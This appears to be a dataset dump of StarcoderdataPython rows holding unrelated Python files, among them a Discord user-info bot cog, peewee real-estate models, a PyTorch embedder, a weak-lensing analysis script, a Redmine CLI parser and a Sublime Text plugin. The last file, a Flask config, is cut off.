id
stringlengths 1
7
| text
stringlengths 6
1.03M
| dataset_id
stringclasses 1
value |
---|---|---|
1656384
|
<reponame>elixir-no-nels/nels-core
from tornado import gen
def coroutine_return():
raise gen.Return()
def return_with_status(hndlr, status_code, response_key=None, response_val=None):
hndlr.set_header('Content-Type', 'application/json')
hndlr.set_status(status_code)
if response_key and response_val:
hndlr.write({response_key:response_val})
coroutine_return()
def return_201(hndlr, new_id):
return_with_status(hndlr, 201, 'id', new_id)
def return_400(hndlr, msgs):
return_with_status(hndlr, 400, "msgs", msgs)
def return_404(hndlr):
return_with_status(hndlr, 404)
def return_500(hndlr):
return_with_status(hndlr, 500)
def return_501(hndlr):
return_with_status(hndlr, 500)
def return_data(hndlr, data):
return_with_status(hndlr, 200, "data", data)
|
StarcoderdataPython
|
1766864
|
from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
@apphook_pool.register
class BackCallHook(CMSApp):
app_name = "roller_site"
name = "Back call"
_urls = ["rollercms.urls"]
def get_urls(self, page=None, language=None, **kwargs):
return ["rollercms.urls"]
@apphook_pool.register
class BlogHook(CMSApp):
app_name = "roller_site"
name = 'Список постов'
def get_urls(self, page=None, language=None, **kwargs):
return ["rollercms.urls"]
|
StarcoderdataPython
|
3292355
|
import torch
from torch import nn
from torch.nn.utils import spectral_norm
from generators.common import blocks
class Wrapper:
@staticmethod
def get_args(parser):
parser.add('--embed_padding', type=str, default='zero', help='zero|reflection')
parser.add('--embed_num_blocks', type=int, default=6)
parser.add('--average_function', type=str, default='sum', help='sum|max')
@staticmethod
def get_net(args):
net = Embedder(
args.embed_padding, args.in_channels, args.out_channels,
args.num_channels, args.max_num_channels, args.embed_channels,
args.embed_num_blocks, args.average_function)
return net.to(args.device)
class Embedder(nn.Module):
def __init__(self, padding, in_channels, out_channels, num_channels, max_num_channels, embed_channels,
embed_num_blocks, average_function):
super().__init__()
def get_down_block(in_channels, out_channels, padding):
return blocks.ResBlock(in_channels, out_channels, padding, upsample=False, downsample=True,
norm_layer='none')
if padding == 'zero':
padding = nn.ZeroPad2d
elif padding == 'reflection':
padding = nn.ReflectionPad2d
in_channels = 3
self.out_channels = embed_channels
self.down_block = nn.Sequential(
padding(1),
spectral_norm(
nn.Conv2d(3, num_channels, 3, 1, 0),
eps=1e-4),
nn.ReLU(),
padding(1),
spectral_norm(
nn.Conv2d(num_channels, num_channels, 3, 1, 0),
eps=1e-4),
nn.AvgPool2d(2))
self.skip = nn.Sequential(
spectral_norm(
nn.Conv2d(3, num_channels, 1),
eps=1e-4),
nn.AvgPool2d(2))
layers = []
in_channels = num_channels
for i in range(1, embed_num_blocks - 1):
out_channels = min(in_channels * 2, max_num_channels)
layers.append(get_down_block(in_channels, out_channels, padding))
in_channels = out_channels
layers.append(get_down_block(out_channels, embed_channels, padding))
self.down_blocks = nn.Sequential(*layers)
self.average_function = average_function
self.finetuning = False
def enable_finetuning(self, data_dict=None):
self.finetuning = True
def get_identity_embedding(self, data_dict):
enc_rgbs = data_dict['enc_rgbs']
inputs = enc_rgbs
b, n, c, h, w = inputs.shape
inputs = inputs.view(-1, c, h, w)
out = self.down_block(inputs)
out = out + self.skip(inputs)
out = self.down_blocks(out)
out = torch.relu(out)
embeds_elemwise = out.view(b, n, self.out_channels, -1).sum(3)
if self.average_function == 'sum':
embeds = embeds_elemwise.mean(1)
elif self.average_function == 'max':
embeds = embeds_elemwise.max(1)[0]
else:
raise Exception('Incorrect `average_function` argument, expected `sum` or `max`')
data_dict['embeds'] = embeds
data_dict['embeds_elemwise'] = embeds_elemwise
def get_pose_embedding(self, data_dict):
pass
def forward(self, data_dict):
if not self.finetuning:
self.get_identity_embedding(data_dict)
self.get_pose_embedding(data_dict)
|
StarcoderdataPython
|
1637090
|
from typing import Optional
from discord.ext import commands
from .utils import checks
from .utils.dataIO import DataIO
from discord import Member, Embed, Role, utils
import discord
from datetime import datetime,timedelta
import time
import re
from typing import Union
import json
class Userinfo(commands.Cog):
"""show infos about the current or other users"""
def __init__(self, bot):
self.bot = bot
self.bot.loop.create_task(self.create_name_tables())
@commands.command(pass_context=True)
async def userinfo(self,ctx, member: Member=None):
"""shows the info about yourself or another user"""
if member is None:
member = ctx.message.author
join_date = member.joined_at
created_at = member.created_at
user_color = member.color
user_roles = member.roles.copy()
server = ctx.message.guild
if member.nick:
nick = member.nick
else:
nick = member.name
time_fmt = "%d %b %Y %H:%M"
joined_number_of_days_diff = (datetime.utcnow() - join_date).days
created_number_of_days_diff = (datetime.utcnow() - created_at).days
member_number = sorted(server.members, key=lambda m: m.joined_at).index(member) + 1
embed = Embed(description="[{0.name}#{0.discriminator} - {1}]({2})".format(member, nick, member.avatar_url), color=user_color)
if member.avatar_url:
embed.set_thumbnail(url=member.avatar_url)
else:
embed.set_thumbnail(url=member.default_avatar_url)
embed.add_field(name="Joined Discord on",
value="{}\n({} days ago)".format(member.created_at.strftime(time_fmt),
created_number_of_days_diff),
inline=True)
embed.add_field(name="Joined Server on",
value="{}\n({} days ago)".format(member.joined_at.strftime(time_fmt),
joined_number_of_days_diff),
inline=True)
user_roles.pop(0)
if user_roles:
embed.add_field(name="Roles", value=", ".join([x.mention for x in user_roles]), inline=True)
embed.set_footer(text="Member #{} | User ID: {}".format(member_number, member.id))
await ctx.send(embed=embed)
@commands.command(aliases=["avi", "profile_pic"])
async def pfp(self, ctx, member: Union[discord.Member, str] = None):
"""
makes the bot post the pfp of a member
"""
if isinstance(member, discord.Member):
await ctx.send(member.avatar_url_as(static_format="png"))
elif isinstance(member, str):
pattern = re.compile(r'(<@!?)?(\d{17,})>?')
match = pattern.match(member)
if match and match.group(2):
user = await self.bot.fetch_user(int(match.group(2)))
if user:
await ctx.send(user.avatar_url_as(static_format="png"))
else:
await ctx.send("Not a valid user ID or mention")
else:
await ctx.send(ctx.author.avatar_url_as(static_format="png"))
@commands.command(pass_context=True)
async def serverinfo(self, ctx):
"""shows info about the current server"""
server = ctx.message.guild
time_fmt = "%d %b %Y %H:%M"
creation_time_diff = int(time.time() - time.mktime(server.created_at.timetuple())) // (3600 * 24)
users_total = len(server.members)
users_online = len([m for m in server.members if m.status == discord.Status.online or
m.status == discord.Status.idle])
colour = server.me.colour
if server.icon:
embed = Embed(description="[{}]({})\nCreated {} ({} days ago)"
.format(server.name, server.icon_url, server.created_at.strftime(time_fmt), creation_time_diff),
color=colour)
embed.set_thumbnail(url=server.icon_url)
else:
embed = Embed(description="{}\nCreated {} ({} days ago)"
.format(server.name, server.created_at.strftime(time_fmt), creation_time_diff))
embed.add_field(name="Region", value=str(server.region))
embed.add_field(name="Users", value="{}/{}".format(users_online, users_total))
embed.add_field(name="Text Channels", value="{}"
.format(len([x for x in server.channels if type(x) == discord.TextChannel])))
embed.add_field(name="Voice Channels", value="{}"
.format(len([x for x in server.channels if type(x) == discord.VoiceChannel])))
embed.add_field(name="Roles", value="{}".format(len(server.roles)))
embed.add_field(name="Owner", value=str(server.owner))
embed.set_footer(text="Server ID: {}".format(server.id))
await ctx.send(embed=embed)
@commands.command()
async def roleinfo(self, ctx, role=None):
"""shows information about the server roles"""
role_converter = commands.RoleConverter()
server = ctx.message.guild
roles = server.roles
embed = Embed()
embed.set_thumbnail(url=server.icon_url)
if not role:
for role in roles:
if role.name == "@everyone":
continue
member_with_role = [member for member in server.members if role in member.roles]
embed.add_field(name=role.name, value="{} Member(s)".format(len(member_with_role)))
else:
role = await role_converter.convert(ctx=ctx, argument=role)
member_with_role = [member for member in server.members if role in member.roles]
embed.add_field(name=role.name, value="{} Member(s)".format(len(member_with_role)))
await ctx.send(embed=embed)
async def fetch_names(self, member):
async with self.bot.db.acquire() as con:
stmt = await con.prepare('''
SELECT *
FROM (
SELECT DISTINCT ON (name) *
from names
where user_id = $1
) p
ORDER BY change_date DESC
LIMIT 20
''')
return await stmt.fetch(member.id)
async def fetch_nicknames(self, member):
async with self.bot.db.acquire() as con:
stmt = await con.prepare('''
SELECT *
FROM (
SELECT DISTINCT ON (nickname) *
from nicknames
where user_id = $1
) p
ORDER BY change_date DESC
LIMIT 20
''')
return await stmt.fetch(member.id)
async def create_name_tables(self):
query = '''
CREATE TABLE IF NOT EXISTS names(
user_id BIGINT,
name varchar(32),
change_date timestamp
);
CREATE TABLE IF NOT EXISTS nicknames(
user_id BIGINT,
nickname varchar(32),
change_date timestamp
);
'''
async with self.bot.db.acquire() as con:
async with con.transaction():
await con.execute(query)
@commands.is_owner()
@commands.command()
async def lnames(self, ctx):
data_io = DataIO()
entries = data_io.load_json('names')
for entry in entries:
names = entries[entry].get("names", [])
nicknames = entries[entry].get("nicknames", [])
async with self.bot.db.acquire() as con:
for name in names:
stmt = await con.prepare('''
INSERT INTO names VALUES ($1,$2,current_timestamp)
RETURNING *
''')
async with con.transaction():
await stmt.fetch(int(entry), name)
for nickname in nicknames:
stmt = await con.prepare('''
INSERT INTO nicknames VALUES ($1,$2,current_timestamp)
RETURNING *
''')
async with con.transaction():
await stmt.fetch(int(entry), nickname)
@commands.command()
async def names(self, ctx, member: Member=None):
"""
lists the past 20 names and nicknames of a user
"""
if not member:
member = ctx.message.author
data_names = await self.fetch_names(member)
data_nicknames = await self.fetch_nicknames(member)
nickname_list = []
names_list = []
for entry in data_names:
names_list.append(entry['name'])
for entry in data_nicknames:
nickname_list.append(entry['nickname'])
if member.name not in names_list:
names_list.insert(0, member.name)
if member.nick not in nickname_list and member.nick:
nickname_list.insert(0, member.nick)
message_fmt = "**Past 20 names:**\n{}\n" \
"**Past 20 nicknames:**\n{}"
names_list_str = discord.utils.escape_markdown(", ".join(names_list))
display_names_list_str = discord.utils.escape_markdown(", ".join(nickname_list))
await ctx.send(message_fmt.format(names_list_str, display_names_list_str))
@commands.Cog.listener("on_member_update")
async def save_nickname_change(self, before, after):
forbidden_word_regex = re.compile(r'(trap|nigg(a|er)|fag(got)?)')
if forbidden_word_regex.search(before.display_name) or forbidden_word_regex.search(after.display_name):
return
if before.nick != after.nick and after.nick:
async with self.bot.db.acquire() as con:
stmt = await con.prepare('''
INSERT INTO nicknames VALUES ($1,$2,current_timestamp)
RETURNING *
''')
async with con.transaction():
new_row = await stmt.fetch(after.id, after.nick)
@commands.Cog.listener("on_user_update")
async def save_username_change(self, before, after):
forbidden_word_regex = re.compile(r'(trap|nigg(a|er)|fag(got)?)')
if forbidden_word_regex.search(before.name) or forbidden_word_regex.search(after.name):
return
if before.name != after.name:
async with self.bot.db.acquire() as con:
stmt = await con.prepare('''
INSERT INTO names VALUES ($1,$2,current_timestamp)
RETURNING *
''')
async with con.transaction():
new_row = await stmt.fetch(after.id, after.name)
def setup(bot):
bot.add_cog(Userinfo(bot=bot))
|
StarcoderdataPython
|
4814974
|
<reponame>zhu4ce4/lianjia
# -*- coding: utf-8 -*-
from peewee import *
import datetime
import settings
if settings.DBENGINE.lower() == 'mysql':
database = MySQLDatabase(
settings.DBNAME,
host=settings.DBHOST,
port=settings.DBPORT,
user=settings.DBUSER,
passwd=settings.DBPASSWORD,
charset='utf8',
use_unicode=True,
)
elif settings.DBENGINE.lower() == 'sqlite3':
database = SqliteDatabase(settings.DBNAME)
elif settings.DBENGINE.lower() == 'postgresql':
database = PostgresqlDatabase(
settings.DBNAME,
user=settings.DBUSER,
password=settings.DBPASSWORD,
host=settings.DBHOST,
charset='utf8',
use_unicode=True,
)
else:
raise AttributeError("Please setup datatbase at settings.py")
class BaseModel(Model):
class Meta:
database = database
class Community(BaseModel):
id = BigIntegerField(primary_key=True)
title = CharField()
link = CharField(unique=True)
district = CharField()
busicircle = CharField()
tagList = CharField()
onsale = CharField()
onrent = CharField(null=True)
builtyear = CharField(null=True)
builttype = CharField(null=True)
wuyecost = CharField(null=True)
servcomp = CharField(null=True)
builtcomp = CharField(null=True)
buildingnum = CharField(null=True)
housenum = CharField(null=True)
price = CharField(null=True)
followers = IntegerField(null=True)
dealin90 = IntegerField(null=True)
validdate = DateTimeField(default=datetime.datetime.now)
class Houseinfo(BaseModel):
houseID = CharField(primary_key=True)
title = CharField()
link = CharField()
community = CharField()
years = CharField()
housetype = CharField()
square = CharField()
direction = CharField()
floor = CharField()
taxtype = CharField()
totalPrice = CharField()
unitPrice = CharField()
followInfo = CharField()
decoration = CharField()
validdate = DateTimeField(default=datetime.datetime.now)
class Hisprice(BaseModel):
houseID = CharField()
totalPrice = CharField()
date = DateTimeField(default=datetime.datetime.now)
class Meta:
primary_key = CompositeKey('houseID', 'totalPrice')
class Sellinfo(BaseModel):
houseID = CharField(primary_key=True)
title = CharField()
link = CharField()
community = CharField()
years = CharField()
housetype = CharField()
square = CharField()
direction = CharField()
floor = CharField()
status = CharField()
source = CharField()
totalPrice = CharField()
unitPrice = CharField()
dealdate = CharField(null=True)
updatedate = DateTimeField(default=datetime.datetime.now)
class Rentinfo(BaseModel):
# 由于网页中未找到房子id,故不用该项:utf-8
# houseID = CharField(primary_key=True)
title = CharField()
link = CharField()
region = CharField()
zone = CharField()
meters = CharField()
shitingwei = CharField()
price = CharField()
updatedate = DateTimeField(default=datetime.datetime.now)
def database_init():
database.connect()
database.create_tables(
# [Community, Houseinfo, Hisprice, Sellinfo, Rentinfo], safe=True)
[Community], safe=True)
database.close()
|
StarcoderdataPython
|
1797103
|
#!/usr/bin/env python
"""
Compute the DSigma profiles for different lenses
"""
import os
import pickle
from astropy.table import Table
from jianbing import scatter
from jianbing import wlensing
TOPN_DIR = '/tigress/sh19/work/topn/'
# Lensing data using medium photo-z quality cut
s16a_lensing = os.path.join(TOPN_DIR, 'prepare', 's16a_weak_lensing_medium.hdf5')
# Random
s16a_rand = Table.read(s16a_lensing, path='random')
# Pre-compute results using medium photo-z quality cut
s16a_precompute_med = os.path.join(
TOPN_DIR, 'precompute', 'topn_public_s16a_medium_precompute.hdf5')
# Pre-compute results for each individual samples
# HSC massive galaxies
hsc = Table.read(s16a_precompute_med, path='hsc_extra')
# TopN bins
topn_bins = Table.read(
os.path.join(TOPN_DIR, 'precompute', 'topn_bins.fits'))
# Tablulated simulation results
sim_cat = Table.read(
os.path.join(TOPN_DIR, 'precompute', 'sim_merge_all_dsig.fits'))
# HSC properties to use
# Stellar or halo mass measurements for HSC galaxies
hsc_mass = [
'logm_cmod', 'logm_5', 'logm_10', 'logm_15', 'logm_25',
'logm_30', 'logm_40', 'logm_50', 'logm_60',
'logm_75', 'logm_100', 'logm_120', 'logm_150', 'logm_max',
'logmh_vir_forest', 'logmh_vir_plane', 'logmh_vir_symbol',
'logm_extra_120', 'logm_extra_150', 'logm_extra_200', 'logm_extra_300',
'logm_r50', 'logm_r50_half', 'logm_2_r50', 'logm_3_r50',
'logm_4_r50', 'logm_5_r50', 'logm_6_r50',
'logm_10_100', 'logm_30_100', 'logm_40_100', 'logm_50_100', 'logm_60_100',
'logm_50_150', 'logm_60_150', 'logm_75_150', 'logm_40_120', 'logm_50_120',
'logm_60_120', 'logm_75_120',
'logm_50_120_extra', 'logm_50_150_extra', 'logm_50_200_extra', 'logm_50_300_extra',
'logm_2_4_r50', 'logm_2_6_r50', 'logm_3_4_r50', 'logm_3_5_r50',
'logm_3_6_r50', 'logm_4_6_r50'
]
# Size measurements for HSC galaxies
hsc_size = ['r50_100', 'r80_100', 'r90_100', 'r50_120', 'r80_120', 'r90_120',
'r50_max', 'r80_max', 'r90_max', 'logr_vir_forest']
# S18A bright star mask
bsm_s18a = hsc['flag'] > 0
# General mask for HSC galaxies
mask = (
(hsc['c82_100'] <= 18.) & (hsc['logm_100'] - hsc['logm_50'] <= 0.2) &
bsm_s18a
)
# General mask for HSC size measurements
size_mask = (
mask & (hsc['logm_max'] >= 11.3) & (hsc['r80_100'] <= 60.0) & (hsc['r90_100'] <= 60.0)
)
# Mask to select "central" galaxies
cen_mask_1 = hsc['cen_mask_1'] > 0
cen_mask_2 = hsc['cen_mask_2'] > 0
cen_mask_3 = hsc['cen_mask_3'] > 0
n_rand = 200000
n_boot = 1000
n_jobs = 8
topn_galaxies = {}
topn_galaxies_sum = {}
# Stellar mass related
for col in hsc_mass:
# Default test with both jackknife and bootstrap error
topn_galaxies[col] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=mask, n_rand=n_rand,
n_boot=n_boot, verbose=True, n_jobs=n_jobs)
topn_galaxies_sum[col] = scatter.compare_model_dsigma(
topn_galaxies[col], sim_cat, model_err=False, poly=True, verbose=True)
# The whole sample, without applying any mask; no bootstrap error
topn_galaxies[col + '_all'] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=None, n_rand=n_rand,
verbose=False, n_jobs=n_jobs, n_boot=200)
topn_galaxies_sum[col + '_all'] = scatter.compare_model_dsigma(
topn_galaxies[col + '_all'], sim_cat, model_err=False, poly=True, verbose=False)
# Applying central mask 1; no bootstrap error
topn_galaxies[col + '_cen1'] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=(mask & cen_mask_1), n_rand=n_rand,
verbose=False, n_jobs=n_jobs, n_boot=200)
topn_galaxies_sum[col + '_cen1'] = scatter.compare_model_dsigma(
topn_galaxies[col + '_cen1'], sim_cat, model_err=False, poly=True, verbose=False)
# Applying central mask 2; no bootstrap error
topn_galaxies[col + '_cen2'] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=(mask & cen_mask_2), n_rand=n_rand,
verbose=False, n_jobs=n_jobs, n_boot=200)
topn_galaxies_sum[col + '_cen2'] = scatter.compare_model_dsigma(
topn_galaxies[col + '_cen2'], sim_cat, model_err=False, poly=True, verbose=False)
# Applying central mask 3; no bootstrap error
topn_galaxies[col + '_cen3'] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=(mask & cen_mask_3), n_rand=n_rand,
verbose=False, n_jobs=n_jobs, n_boot=200)
topn_galaxies_sum[col + '_cen3'] = scatter.compare_model_dsigma(
topn_galaxies[col + '_cen3'], sim_cat, model_err=False, poly=True, verbose=False)
# Galaxy size related
for col in hsc_size:
# Default test with both jackknife and bootstrap error
topn_galaxies[col] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=(mask & size_mask), n_rand=n_rand,
n_boot=n_boot, verbose=True, n_jobs=n_jobs)
topn_galaxies_sum[col] = scatter.compare_model_dsigma(
topn_galaxies[col], sim_cat, model_err=False, poly=True, verbose=False)
# The whole sample, without applying any mask; no bootstrap error
topn_galaxies[col + '_all'] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=None, n_rand=n_rand,
verbose=False, n_jobs=n_jobs, n_boot=200)
topn_galaxies_sum[col + '_all'] = scatter.compare_model_dsigma(
topn_galaxies[col + '_all'], sim_cat, model_err=False, poly=True, verbose=False)
# Applying central mask 1; no bootstrap error
topn_galaxies[col + '_cen1'] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=(mask & size_mask & cen_mask_1), n_rand=n_rand,
n_boot=n_boot, verbose=False, n_jobs=n_jobs)
topn_galaxies_sum[col + '_cen1'] = scatter.compare_model_dsigma(
topn_galaxies[col + '_cen1'], sim_cat, model_err=False, poly=True, verbose=False)
# Applying central mask 2; no bootstrap error
topn_galaxies[col + '_cen2'] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=(mask & size_mask & cen_mask_2), n_rand=n_rand,
n_boot=n_boot, verbose=False)
topn_galaxies_sum[col + '_cen2'] = scatter.compare_model_dsigma(
topn_galaxies[col + '_cen2'], sim_cat, model_err=False, poly=True, verbose=False)
# Applying central mask 3; no bootstrap error
topn_galaxies[col + '_cen3'] = wlensing.gather_topn_dsigma_profiles(
hsc, s16a_rand, topn_bins, col, mask=(mask & size_mask & cen_mask_3), n_rand=n_rand,
n_boot=n_boot, verbose=False)
topn_galaxies_sum[col + '_cen3'] = scatter.compare_model_dsigma(
topn_galaxies[col + '_cen3'], sim_cat, model_err=False, poly=True, verbose=False)
pickle.dump(
topn_galaxies, open(os.path.join(TOPN_DIR, 'topn_galaxies.pkl'), "wb"))
pickle.dump(
topn_galaxies_sum, open(os.path.join(TOPN_DIR, 'topn_galaxies_sum.pkl'), "wb"))
|
StarcoderdataPython
|
1732672
|
import argparse
import sys
import helpers
def preprocess_argv():
# Remove script from argv
argv = sys.argv[1:]
if len(argv):
command_abbreviations = {
'l': 'list',
'u': 'update',
'n': 'new',
'd': 'delete',
'p': 'periods'
}
if argv[0] in command_abbreviations:
# Expand command abbreviation
argv[0] = command_abbreviations[argv[0]]
elif argv[0][0:1] == '+':
# "+<issue>" is shorthand for "new <issue>"
argv = ['new', argv[0][1:]] + argv[1:]
elif len(argv) == 1 and helpers.resolve_period_abbreviation(argv[0]):
# If time period given, not command, use as basis for list command
argv = ['list', argv[0]]
else:
# Default to "list" command
argv = ['list']
return argv
def arg_parser():
"""Return ArgumentParser for this application."""
parser = argparse.ArgumentParser(description='Redmine client.')
subparsers = parser.add_subparsers(dest='command')
# Parent parser for new and update commands (with options common to both)
entry_parser = argparse.ArgumentParser(add_help=False)
entry_parser.add_argument('-c', '--comments', metavar='comments', action='store')
entry_parser.add_argument('-t', '--hours', metavar='hours spent', action='store')
entry_parser.add_argument('-a', '--activity', metavar='activity', action='store')
entry_parser.add_argument('-d', '--date', metavar='date', action='store', help='defaults to today')
# New entry command
parser_new = subparsers.add_parser('new', help='Create new time entry', parents=[entry_parser])
parser_new.add_argument('id', nargs='?', metavar='issue ID', help='ID of issue')
parser_new.set_defaults(func='new_entry')
# Update entry command
parser_update = subparsers.add_parser('update', help='Update time entry', parents=[entry_parser])
parser_update.add_argument('id', nargs='?', metavar='time entry ID', help='ID of time entry')
parser_update.set_defaults(func='update_entry')
# List command
parser_list = subparsers.add_parser('list', help='List time entries')
parser_list.add_argument('period', nargs='?', metavar='period', help='time period')
parser_list.add_argument('-s', '--start', metavar='start date', action='store')
parser_list.add_argument('-e', '--end', metavar='end date', action='store')
parser_list.set_defaults(func='list_entries')
# Delete command
parser_delete = subparsers.add_parser('delete', help='Delete time entry')
parser_delete.add_argument('id', nargs='?', metavar='time entry ID', help='ID of time entry')
parser_delete.set_defaults(func='delete_entry')
# Periods command
parser_periods = subparsers.add_parser('periods', help='List periods')
parser_periods.set_defaults(func='list_periods')
# Flush command
parser_flush = subparsers.add_parser('flush', help='Flush cache')
parser_flush.set_defaults(func='flush')
return parser
def validate_args(parser, args, config, activities):
# Normalize and validate period
if 'period' in args and args.period:
args.period = helpers.resolve_period_abbreviation(args.period)
if not args.period:
parser.error('Invalid period.')
# Normalize and validate issue/entry ID
if 'id' in args and args.id:
if args.command == 'new':
default_comments = helpers.template_field(args.id, 'comments', config['issues'])
default_hours = helpers.template_field(args.id, 'hours', config['issues'])
default_activity = helpers.template_field(args.id, 'activity', config['issues'])
if default_comments and not args.comments:
args.comments = default_comments
if default_hours and not args.hours:
args.hours = default_hours
if default_activity and not args.activity:
args.activity = default_activity
args.id = helpers.resolve_issue_alias(args.id, config['issues'])
if not str(args.id).isdigit():
parser.error('Invalid ID.')
if 'activity' in args and args.activity:
args.activity = helpers.resolve_activity_alias(args.activity, config['activities'])
if args.activity not in activities:
parser.error('Invalid activity.')
return args
|
StarcoderdataPython
|
20197
|
<reponame>rodrigocamposdf/MovieBot<gh_stars>1-10
import movies
def action_handler(action, parameters, return_var):
return_values = {}
if action == 'trendings':
return_values = get_trendings(parameters, return_var)
elif action == 'search':
return_values = search_movies(parameters, return_var)
return {
'skills': {
'main skill': {
'user_defined': return_values
}
}
}
def get_trendings(parameters, return_var):
is_day = (parameters['periodo'] == 'dia')
movie_titles = movies.get_trendings(is_day)
# trato os nomes aqui para facilitar, tratar no assistant eh mais complexo
# pois nao tenho o mesmo poder de programacao
movie_string = '\n\n'
for movie in movie_titles:
movie_string += movie + ',\n'
movie_string = movie_string[:-2]
return {
return_var: movie_string
}
def search_movies(parameters, return_var):
query = parameters['termo']
movie_titles = movies.search_movies(query)
# trato os nomes aqui para facilitar, tratar no assistant eh mais complexo
# pois nao tenho o mesmo poder de programacao
movie_string = '\n\n'
for movie in movie_titles:
movie_string += movie + ',\n'
movie_string = movie_string[:-2]
return {
return_var: movie_string
}
|
StarcoderdataPython
|
186332
|
import os.path
import sublime_plugin
import sublime
def get_setting(
setting,
default=None,
window=None,
settings_file='OpenHighlightedPath.sublime-settings',
project_settings='open_highlighted_path',
settings_only=False,
project_only=False
):
"""
FIXME: Maybe cache the settings,
rather than getting them every time.
"""
window = window if window else sublime.active_window()
if not settings_only:
settings = window.project_data()
if settings and project_settings:
settings = settings.get(project_settings)
if settings and setting in settings:
return settings.get(setting)
if not project_only:
settings = sublime.load_settings(settings_file)
if settings and settings.has(setting):
return settings.get(setting)
return default
def find_path_from_others(path, others):
"""
Break up all paths in others and see if we can
file a file that exists when prepended to "path".
"""
if path.startswith('/'):
path = path[1:]
hits = []
for other in others:
sep = '/' if other.find('/') != -1 else '\\'
path_pieces = other.split(sep)
so_far = '/'
for path_piece in path_pieces:
so_far = os.path.join(so_far, path_piece)
temp_path = os.path.join(so_far, path)
if os.path.exists(temp_path):
hits.append(temp_path)
return hits
class OpenHighlightedPathCommand(sublime_plugin.TextCommand):
def run(self, edit, path=None):
if path is None:
# get the current line and the current column
sel = self.view.sel()
try:
region = sel[0]
except IndexError:
return
if region.a == region.b:
point = region.a
line = self.view.line(point)
col = self.view.rowcol(point)[1]
text = self.view.substr(line)
# Get the path by walking left and right from the current cursor location
path = ''
delimiters = get_setting('delimiters', ' "\'')
if text:
# Walk left from point to end of path
for i in range(col - 1, -1, -1):
character = text[i]
if delimiters.find(character) != -1:
break
path = '%s%s' % (character, path)
# Walk right from point to end of path
for i in range(col, len(text)):
character = text[i]
if delimiters.find(character) != -1:
break
path = '%s%s' % (path, character)
else:
path = self.view.substr(region)
path = path.strip()
self.hits = []
if os.path.exists(path) and not get_setting('exclude_literal', False):
self.hits.append(path)
# Try to find file based on other open files
if not get_setting('exclude_current', False):
others = [x.file_name() for x in self.view.window().views() if x.file_name()]
self.hits.extend(find_path_from_others(path, others))
# Try to find file based on the current project
if not get_setting('exclude_project', False):
others = []
for folder in get_setting('folders', [], project_settings=None, project_only=True):
folder = folder.get('path', '')
if folder:
others.append(folder)
self.hits.extend(find_path_from_others(path, others))
# Try to find file based on settings base directories
self.hits.extend(find_path_from_others(path, get_setting('base_directories', [])))
self.hits = list(set(self.hits))
if not self.hits:
sublime.status_message('Could not find file "%s"' % path)
elif len(self.hits) == 1:
self.open_file(0)
else:
self.view.window().show_quick_panel(
self.hits,
self.open_file,
on_highlight=lambda x: self.open_file(x, sublime.TRANSIENT)
)
def open_file(self, selection, flags=0):
if selection != -1:
self.view.window().open_file(self.hits[selection], flags)
|
StarcoderdataPython
|
3346503
|
import functools
def part1(input_data):
risk_level = 0
height = len(input_data)
width = len(input_data[0])
for j in range(height):
for i in range(width):
cell = input_data[j][i]
if j > 0 and input_data[j - 1][i] <= cell:
continue
if j < height - 1 and input_data[j + 1][i] <= cell:
continue
if i > 0 and input_data[j][i - 1] <= cell:
continue
if i < width - 1 and input_data[j][i + 1] <= cell:
continue
risk_level += cell + 1
return risk_level
class Cell:
def __init__(self, value):
self.value = value
self.neighbors = []
self.visited = False
def get_size(self):
if self.visited:
return 0
self.visited = True
return 1 + sum(map(lambda x: x.get_size(), self.neighbors))
def part2(input_data):
# Floodfill every area that is not 9 and find their size
basins = []
# First build a cell grid with neighbor links
height = len(input_data)
width = len(input_data[0])
grid = [[Cell(y) for y in x] for x in input_data]
for j in range(height):
for i in range(width):
cell = grid[j][i]
if cell.value == 9:
continue
if j > 0 and grid[j - 1][i].value != 9:
cell.neighbors.append(grid[j - 1][i])
if j < height - 1 and grid[j + 1][i].value != 9:
cell.neighbors.append(grid[j + 1][i])
if i > 0 and grid[j][i - 1].value != 9:
cell.neighbors.append(grid[j][i - 1])
if i < width - 1 and grid[j][i + 1].value != 9:
cell.neighbors.append(grid[j][i + 1])
for j in range(height):
for i in range(width):
cell = grid[j][i]
if cell.value == 9 or cell.visited:
continue
# Floodfill
basin_size = cell.get_size()
basins.append(basin_size)
return functools.reduce(lambda a, b: a * b, sorted(basins)[::-1][:3])
if __name__ == "__main__":
with open("input", "r") as input_file:
input_data = list(map(lambda x: x.strip(), input_file.readlines()))
input_data = list(map(lambda x: [int(y) for y in x], input_data))
print(part1(input_data))
print(part2(input_data))
|
StarcoderdataPython
|
55679
|
# coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from .manager import *
from .storages import *
|
StarcoderdataPython
|
1691594
|
<filename>prediction/config.py
"""
prediction.config
~~~~~~~~~~~~~~~~~
Provides the flask config options
"""
import os
from os import path
LIDC_WILDCARD = ['LIDC-IDRI-*', '**', '**']
class Config(object):
PROD_SERVER = os.getenv('PRODUCTION', False)
DEBUG = False
CURRENT_DIR = path.dirname(path.realpath(__file__))
PARENT_DIR = path.dirname(CURRENT_DIR)
ALGOS_DIR = path.abspath(path.join(CURRENT_DIR, 'src', 'algorithms'))
SEGMENT_ASSETS_DIR = path.abspath(path.join(ALGOS_DIR, 'segment', 'assets'))
FULL_DICOM_PATHS = path.join(PARENT_DIR, 'images_full')
SMALL_DICOM_PATHS = path.join(PARENT_DIR, 'images')
FULL_DICOM_PATHS_WILDCARD = path.join(FULL_DICOM_PATHS, *LIDC_WILDCARD)
SMALL_DICOM_PATHS_WILDCARD = path.join(FULL_DICOM_PATHS, *LIDC_WILDCARD)
DATA_DIR = path.abspath(path.join(CURRENT_DIR, 'data'))
EXTRACTED_IMAGE_DIR = path.abspath(path.join(CURRENT_DIR, 'extracted'))
class Production(Config):
pass
class Development(Config):
DEBUG = True
class Test(Config):
